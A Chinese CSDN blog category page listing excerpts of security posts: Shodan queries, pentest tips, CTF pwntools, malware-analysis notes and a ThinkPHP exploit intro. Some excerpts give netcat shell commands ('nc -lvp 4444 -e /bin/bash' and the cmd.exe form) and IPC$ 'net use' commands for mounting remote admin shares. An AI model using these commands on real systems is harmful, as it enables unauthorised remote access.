![](https://img-blog.csdnimg.cn/20201014180756916.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全相关
博闻善行
博识而众享,则积微成著!
展开
-
SSH反向代理使用
SSH反向代理先说说什么是代理,源服务器由于各种原因无法访问目标服务器提供的服务,但是存在一个agent服务器,源服务器可以访问它,它可以访问目标服务器,那么源服务器的消息发给他,它在把请求转发给目标服务器,就间接的实现了源服务器访问目标服务器的目的。这就是代理,也是一般所说的正向代理,正向代理一般是代理客户端(源服务器,信息的请求者)。这时候,在公网上发送的信息的请求者就是代理服务器的身份,而不是真正客户端的身份。好处显而易见,隐藏客户端的身份。反向代理百度百科:当一个代理服务器能够代理外部网络原创 2022-02-09 21:49:44 · 5356 阅读 · 2 评论 -
shodan信息收集基础操作
shodan主要用于搜索网络设备:webcam,路由器,服务器,IOT设备等基础搜索命令:country:chinacity:nanjingport:22os:Windows xpdevice:webcam,switchhas_vuln:true在命令框中的组合以空格符隔开查询主机信息:ping www.baidu.com得到域名对应的IP然后搜索host:ip即可...原创 2021-08-08 23:02:30 · 554 阅读 · 0 评论 -
渗透测试小经验(一)
一、信息收集nmap扫描二、漏洞利用tips测试端口是否开放:telnet IP portnc -nv IP port漏洞利用之IPC$前提:假设设置了文件共享,将远程共享文件夹当做本地的F盘net use f: \10.235.15.2\share 远程密码 /user:用户查看列表net use删除net use f: /delnet use * /del访问远程其他盘net use f: \10.235.15.2\c$ 远程密码 /user:用户...原创 2021-05-09 22:16:26 · 692 阅读 · 0 评论 -
PE文件windows加载执行过程
Windows进程创建过程第一阶段:打开目标映像文件,创建Section由CreateProcess函数完成字符串采用ASCII字符,则使用CreateProcessA函数字符串采用Unicode字符,则使用CreateProcessW函数由于windows内部都是Unicode字符,所以CreateProcessA函数只是将ASCII字符转换成Unicode字符后继续调用的CreateProcessW函数CreateProcess函数步骤:1.检查PE文件的有效性2.为PE文件分配Sect原创 2021-03-21 15:52:41 · 1194 阅读 · 0 评论 -
centos下mongodb快速入门
MongoDB 简介MongoDB 是由C++语言编写的,是一个基于分布式文件存储的开源数据库系统。MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。MongoDB 启动启动mongodb并指定配置文件mongod --config /etc/mongodb.conf后台启动mongodb并指定配置文件mongod -f /etc/mongodb.conf通过 shell 连接 MongoDB 服务:$ ./mongoMongo原创 2021-03-15 23:03:00 · 239 阅读 · 0 评论 -
内存映射--学习积累
当CPU读取数据时,是由内存管理单元(MMU)管理的。MMU位于CPU与物理内存之间,它包含从虚地址向物理内存地址转化的映射信息。mmap将一个文件或者其它对象映射进内存。文件被映射到多个页上,如果文件的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。 munmap执行相反的操作,删除特定地址区域的对象映射。PE文件的结构在磁盘和内存中是基本一样的,但在装入内存中时又不是完全复制。Windows装载器在装载的时候仅仅建立好虚拟地址和PE文件之间的映射关系,只有真正执行到某个内存页中的指令或访原创 2021-03-14 22:40:43 · 89 阅读 · 0 评论 -
恶意代码分析总结
寄存器类型:1、CS:代码段寄存器;2、DS:数据段寄存器;3、SS:堆栈段寄存器;4、FS:标志段寄存器5、GS:全局段寄存器6、ES:扩展段寄存器通过读取FS寄存器指定的内存可以获得很多系统关键信息,内核态是fs = 0x30,用户态 fs = 0x3B,fs在内核态指向_KPCR,用户态指向_TEB。TEB(Thread Environment Block),线程环境块,也就是说每一个线程都会有TEB,用于保存系统与线程之间的数据,便于操作控制。那么Fs:[0x30]就是PEB进程环境原创 2021-03-04 22:29:23 · 385 阅读 · 0 评论 -
tcpreplay重放pcap包
Tcpreplay是一种pcap包的重放工具, 它可以将tcpdump和Ethereal/Wireshark等工具捕捉到的网络流量包进行编辑修改和重放. tcpreplay -t -v --intf1=em1 sample.pcap 其中:-t 表示以最快的速度重放数据包-v表示打印数据包细节–intf1指定使用那一个网卡发送数据包-x 重放倍率,比如1倍速率,2倍速率–loop /-l 重放多少次简单命令tcpreplay -i eth0 chat.pcap...原创 2021-02-24 22:48:24 · 2210 阅读 · 0 评论 -
内网渗透之反弹shell
蚕吐丝,蜂酿蜜,人不学,不如物!场景1步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入)nc -lvp 4444 -e cmd.exe (反弹windows shell)nc -lvp 4444 -e /bin/bash (反弹linux shell)步骤二:攻击机连接被控服务器的4444端口(攻击机输入)nc -nv 受害机ip 4444场景22利用nc反弹shell条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限原创 2021-01-31 21:48:34 · 874 阅读 · 0 评论 -
ctf中pwn题目总结
1.安装pip install pwntools (python2)pip3 install pwntools (python3)2.使用Context设置context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话:context(os='linux', arch='amd原创 2020-11-16 23:25:58 · 4697 阅读 · 0 评论 -
IDA PRO7.0安装及问题解决
1.安装,下载IDA7.0(便携版,免安装)链接:https://pan.baidu.com/s/1_jb9WWWUlXbCrHUMbn7ZJQ提取码:au7t2.安装keystone-0.9.1-python-win64,点击下载2.打开IDA是碰到问题keypatch.py ERROR: fail to load the dynamic library解决方法:On Windows, if you get an error message from IDA about “fail to l原创 2020-11-15 14:20:35 · 6078 阅读 · 0 评论 -
ThinkPHP漏洞利用
漏洞标志影响版本ThinkPHP 5.0.x ~ 5.0.23ThinkPHP 5.1.x ~ 5.1.31漏洞利用先查看版本号。在网址上随意输入一个不存在的模块 地址:可以看到,thinkphp 版本为 5.0.20查看信息漏洞利用大致原理:漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。详情参考:https://www.cnblogs.com/backlion/p/10106676.html初步利用代码如下:index.php?s..原创 2020-10-11 10:45:19 · 1498 阅读 · 0 评论 -
splunk总结
1.不同版本splunk下载https://www.splunk.com/page/previous_releases#x86_64windows2.插件下载地址:https://splunkbase.splunk.com/apps/3.github介绍https://github.com/olafhartong/ThreatHunting4.word版详细教程https://www.linkedin.com/pulse/attckized-splunk-kirtar-oza-cissp-ci原创 2020-07-02 23:50:00 · 277 阅读 · 0 评论 -
ATT&CK调研
1.网址https://mitre-attack.github.io/attack-navigator/enterprise/原创 2020-06-12 21:34:31 · 317 阅读 · 0 评论